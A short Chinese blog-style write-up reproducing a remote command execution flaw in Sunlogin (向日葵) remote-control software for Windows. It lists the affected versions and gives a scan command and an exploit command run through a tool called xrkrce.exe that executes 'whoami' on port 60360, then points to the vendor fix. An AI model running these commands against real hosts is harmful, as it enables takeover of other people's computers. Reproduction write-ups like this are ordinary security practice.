向日葵RCE漏洞复现

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。上海贝锐信息科技股份有限公司向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

风险等级

高危

影响版本

11.1.1
10.3.0.27372
11.0.0.33162

资产确定

SunloginClient_10.3.0.27372(目前版本已经修复)

漏洞检测

xrkrce.exe -h 127.0.0.1

向日葵RCE漏洞复现_第1张图片

漏洞利用

xrkrce.exe -h 127.0.0.1 -t rce -p 60360 -c "whoami"

向日葵RCE漏洞复现_第2张图片

修复建议

厂商已发布了漏洞修复程序,请及时关注更新:
https://sunlogin.oray.com/

你可能感兴趣的:(漏洞复现,安全,web安全,服务器)